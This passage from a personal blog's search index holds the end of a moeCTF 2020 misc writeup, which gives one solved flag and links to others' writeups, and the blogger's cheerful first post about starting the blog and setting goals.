tool:</p><blockquote><p>YOUAREOSUMASTERSOSOSTRONGTHISFLAGGIVEYOUTOREWARDYOUDONOTAFRAIDOFITSLENGTHITISTHERIGHTFLAG</p><p>moectf{YOUAREOSUMASTERSOSOSTRONGTHISFLAGGIVEYOUTOREWARDYOUDONOTAFRAIDOFITSLENGTHITISTHERIGHTFLAG}</p></blockquote><h2 id="我没做出来的"><a href="#我没做出来的" class="headerlink" title="我没做出来的"></a>The ones I did not solve</h2><p>Referring to the blogs of <a href="https://dawnwhisper.github.io/2020/10/08/Moectf2020%E9%A2%98%E8%A7%A3%E4%B9%8BMisc/#more">Dawnwhisper</a>, <a href="https://blog.csdn.net/qq_45819626/article/details/108961826">-k0414-</a> and <a href="https://arttnba3.cn/2020/09/07/%E3%80%90CTF%E9%A2%98%E8%A7%A3-0x03%E3%80%91moeCTF2020-write-up-by-arttnb3/">arttnba</a>, writeups for the remaining three challenges, 两只企鹅 (Two Penguins), show off, and 闪电风暴 (Lightning Storm) (not recommended to read or attempt...), are all available there; click through and have a look around their blogs. (If an official writeup comes out I will come back and update this.)</p>]]></content>
<categories>
<category> CTF competition writeups </category>
</categories>
<tags>
<tag> CTF </tag>
<tag> wp </tag>
<tag> misc </tag>
</tags>
</entry>
<entry>
<title>My first post</title>
<link href="2020/09/27/My-first-post/"/>
<url>2020/09/27/My-first-post/</url>
<content type="html"><![CDATA[<p>This is BB's blog, a place for sharing and discussion; bloggers of every level are welcome to exchange links with me, a complete newbie~</p><p>(A proxy is recommended for access.)</p><a id="more"></a><h2 id="写在前面"><a href="#写在前面" class="headerlink" title="写在前面"></a>Preface</h2><p>I have always wanted to set up a blog, because I want to post articles recording my learning journey and the small things of daily life (mainly because it looks cool :smirk:). I tried on cnblogs and GitHub before, but because of my own skill level (or because I never found a good tutorial), my previous blogs were all half-dead, and I never published a single post :confounded:. But this time I have finally set up a blog that is at least presentable :joy:. Thanks to the great RX and the other XDSEC <del>(beast)</del> seniors for their guidance. I hope I can update this fairly nice blog often, post more :relieved:, and grow into a big shot soon :stuck_out_tongue_closed_eyes:.</p><!-- more --><h2 id="自我约束"><a href="#自我约束" class="headerlink" title="自我约束"></a>Self-discipline</h2><p>To push my own growth and progress, I am setting myself some flags :triangular_flag_on_post::</p><ul><li>Keep up sustained, high-quality updates: both quality and quantity, one post a week, the more the better</li><li>Maintain my blog regularly, adding something interesting to it now and then, so roughly once a month??? :relaxed:</li></ul><p>Since these are flags, I will do my best to achieve every one of them and stick strictly to this self-discipline!!!</p><p><strong>BB, go for it!!!</strong></p>]]></content>
<categories>
<category> Miscellaneous </category>
</categories>
<tags>
<tag> Miscellaneous </tag>
</tags>
</entry>
</search>